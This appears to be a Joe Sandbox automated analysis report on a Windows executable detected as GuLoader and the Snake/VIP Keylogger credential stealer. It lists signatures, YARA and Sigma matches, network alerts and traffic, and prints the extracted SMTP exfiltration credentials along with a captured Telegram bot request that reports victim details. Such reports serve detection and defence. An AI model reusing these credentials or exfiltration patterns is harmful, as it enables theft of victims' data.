Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Drawing_Products_Materials_and_Samples_IMG.exe

Overview

General Information

Sample name:Drawing_Products_Materials_and_Samples_IMG.exe
Analysis ID:1516835
MD5:9ca0138738dcc4faa58c59c0898d4834
SHA1:d904efbf202092b4b29862951c2b39d1c298ac1b
SHA256:87da16b9e0f9fc7d74735c59b920dea8460d91f497380aa1a83834b86771b9e2
Infos:

Detection

GuLoader, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Opens the same file many times (likely Sandbox evasion)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "logs@astonherald.com", "Password": "office12#", "Host": "smtp.zoho.eu", "Port": "587", "Version": "4.4"}

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "logs@astonherald.com", "Password": "office12#", "Host": "smtp.zoho.eu", "Port": "587"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
          • 0x33f92:$s1: UnHook
          • 0x33f2e:$s2: SetHook
          • 0x33f67:$s3: CallNextHook
          • 0x33ef6:$s4: _hook
          Click to see the 25 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
                • 0x31472:$s1: UnHook
                • 0x3140e:$s2: SetHook
                • 0x31447:$s3: CallNextHook
                • 0x313d6:$s4: _hook
                2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x3d5e0:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x3cc83:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x3cee0:$a4: \Orbitum\User Data\Default\Login Data
                • 0x3d8bf:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 60 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\stub\Sophia.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe, ProcessId: 3392, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\file
                Sigma detected: Suspicious Outbound SMTP Connections
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 185.230.214.164, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe, Initiated: true, ProcessId: 3392, Protocol: tcp, SourceIp: 192.168.11.30, SourceIsIpv6: false, SourcePort: 49821

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-24T16:31:14.013711+020028033053Unknown Traffic192.168.11.3049812172.67.177.134443TCP
                2024-09-24T16:31:14.742507+020028033053Unknown Traffic192.168.11.3049813172.67.177.134443TCP
                2024-09-24T16:31:16.515085+020028033053Unknown Traffic192.168.11.3049814172.67.177.134443TCP
                2024-09-24T16:31:17.255560+020028033053Unknown Traffic192.168.11.3049815172.67.177.134443TCP
                2024-09-24T16:31:18.066005+020028033053Unknown Traffic192.168.11.3049816172.67.177.134443TCP
                2024-09-24T16:31:19.413571+020028033053Unknown Traffic192.168.11.3049817172.67.177.134443TCP
                2024-09-24T16:31:20.165549+020028033053Unknown Traffic192.168.11.3049818172.67.177.134443TCP
                2024-09-24T16:31:20.928000+020028033053Unknown Traffic192.168.11.3049819172.67.177.134443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-24T16:31:10.828763+020028032742Potentially Bad Traffic192.168.11.3049810158.101.44.24280TCP
                2024-09-24T16:31:13.562087+020028032742Potentially Bad Traffic192.168.11.3049810158.101.44.24280TCP
                2024-09-24T16:31:14.296332+020028032742Potentially Bad Traffic192.168.11.3049810158.101.44.24280TCP
                2024-09-24T16:31:16.061568+020028032742Potentially Bad Traffic192.168.11.3049810158.101.44.24280TCP
                2024-09-24T16:31:16.795757+020028032742Potentially Bad Traffic192.168.11.3049810158.101.44.24280TCP
                2024-09-24T16:31:17.592467+020028032742Potentially Bad Traffic192.168.11.3049810158.101.44.24280TCP
                2024-09-24T16:31:18.951543+020028032742Potentially Bad Traffic192.168.11.3049810158.101.44.24280TCP
                2024-09-24T16:31:19.717044+020028032742Potentially Bad Traffic192.168.11.3049810158.101.44.24280TCP
                2024-09-24T16:31:20.466845+020028032742Potentially Bad Traffic192.168.11.3049810158.101.44.24280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-24T16:31:07.421987+020028032702Potentially Bad Traffic192.168.11.304980964.188.18.7580TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "logs@astonherald.com", "Password": "office12#", "Host": "smtp.zoho.eu", "Port": "587", "Version": "4.4"}
                Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "logs@astonherald.com", "Password": "office12#", "Host": "smtp.zoho.eu", "Port": "587"}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\stub\Sophia.exeReversingLabs: Detection: 31%
                Multi AV Scanner detection for submitted file
                Source: Drawing_Products_Materials_and_Samples_IMG.exeReversingLabs: Detection: 31%
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\stub\Sophia.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: Drawing_Products_Materials_and_Samples_IMG.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Drawing_Products_Materials_and_Samples_IMG.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.11.30:49811 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.30:49820 version: TLS 1.2
                Source: Binary string: mshtml.pdb source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000001.17726016358.0000000000649000.00000020.00000001.01000000.00000006.sdmp
                Source: Binary string: _.pdb source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035965000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17883981680.0000000004770000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mshtml.pdbUGP source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000001.17726016358.0000000000649000.00000020.00000001.01000000.00000006.sdmp
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 0_2_00405459 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,0_2_00405459
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 0_2_00405E80 FindFirstFileA,FindClose,0_2_00405E80
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 0_2_0040264F FindFirstFileA,0_2_0040264F
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 36A90D10h2_2_36A90B30
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 36A9169Ah2_2_36A90B30
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 36A92F7Eh2_2_36A92B60
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 36A92834h2_2_36A92580
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 36A92F7Eh2_2_36A92EAC
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 36A9E56Ch2_2_36A9E2C0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 36A9DCBCh2_2_36A9DA10
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 36A9E114h2_2_36A9DE68
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_36A90676
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 36A9F274h2_2_36A9EFC8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 36A9E9C4h2_2_36A9E718
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 36A9EE1Ch2_2_36A9EB70
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 36A92F7Eh2_2_36A92B50
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 36A9CB5Ch2_2_36A9C8B0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 36A9F6CCh2_2_36A9F420
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 36A9FB24h2_2_36A9F878
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_36A90040
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_36A90856
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 36A9D864h2_2_36A9D5B8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 36A9CFB4h2_2_36A9CD08
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 36A9D40Ch2_2_36A9D160
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373625ACh2_2_37362300
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 37367EC8h2_2_37367B88
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 37369693h2_2_373693C0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373655DCh2_2_37365330
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373679DCh2_2_37367730
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 37362A04h2_2_37362758
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 37362E5Ch2_2_37362BB0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 37365A34h2_2_37365788
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 37365E8Ch2_2_37365BE0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 37366CD4h2_2_37366A28
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373648D4h2_2_37364628
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 37361CFCh2_2_37361A50
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 3736B980h2_2_3736B6B0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 37362154h2_2_37361EA8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 37364D2Ch2_2_37364A80
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 3736712Ch2_2_37366E80
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 37367584h2_2_373672D8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 37365184h2_2_37364ED8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 37360FF4h2_2_37360D48
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 3736144Ch2_2_373611A0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373618A4h2_2_373615F8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373662E4h2_2_37366038
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373632B4h2_2_37363008
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 3736370Ch2_2_37363460
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373602ECh2_2_37360040
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 3736673Eh2_2_37366490
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 37360744h2_2_37360498
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 37360B9Ch2_2_373608F0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then mov esp, ebp2_2_3736B0C0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373D6351h2_2_373D5FE0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373D6982h2_2_373D6688
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373D3998h2_2_373D36C8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373D8632h2_2_373D8338
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373DF42Ah2_2_373DF130
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373D9E1Ah2_2_373D9B20
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373DB602h2_2_373DB308
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373DAC72h2_2_373DA978
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373DC45Ah2_2_373DC160
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373D6E4Ah2_2_373D6B50
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373DDC42h2_2_373DD948
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373DD2B2h2_2_373DCFB8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373D7CA2h2_2_373D79A8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373D1E49h2_2_373D1BA0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373DEA9Ah2_2_373DE7A0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373D948Ah2_2_373D9190
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373DF8F2h2_2_373DF5F8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373DA2E2h2_2_373D9FE8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373DBACAh2_2_373DB7D0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373DC922h2_2_373DC628
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373D7312h2_2_373D7018
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373DE10Ah2_2_373DDE10
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373D8AFAh2_2_373D8800
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373D816Ah2_2_373D7E70
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373DEF62h2_2_373DEC68
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373D9952h2_2_373D9658
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373DB13Ah2_2_373DAE40
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373DA7AAh2_2_373DA4B0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373DBF92h2_2_373DBC98
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373DD77Ah2_2_373DD480
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373DCDEAh2_2_373DCAF0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373D77DAh2_2_373D74E0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373DE5D2h2_2_373DE2D8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373D8FC2h2_2_373D8CC8
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 373DFDBAh2_2_373DFAC0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 37401FEAh2_2_37401CF0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 3740165Ah2_2_37401360
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 37400803h2_2_37400508
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 37400CCAh2_2_374009D0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 3740033Ah2_2_37400040
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 37401B22h2_2_37401828
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then jmp 37401192h2_2_37400E98
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]2_2_37585E48
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]2_2_375850F0
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]2_2_3758625E
                Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]2_2_37581C88

                Networking

                barindex
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: global trafficTCP traffic: 192.168.11.30:49821 -> 185.230.214.164:587
                Source: global trafficHTTP traffic detected: GET /xml/79.127.132.20 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/79.127.132.20 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/79.127.132.20 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/79.127.132.20 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/79.127.132.20 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/79.127.132.20 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/79.127.132.20 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/79.127.132.20 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/79.127.132.20 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20and%20Time:%2024/09/2024%20/%2010:31:19%0D%0ACountry%20Name:%20Czechia%0D%0A%5B%20888683%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 185.230.214.164 185.230.214.164
                Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
                Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
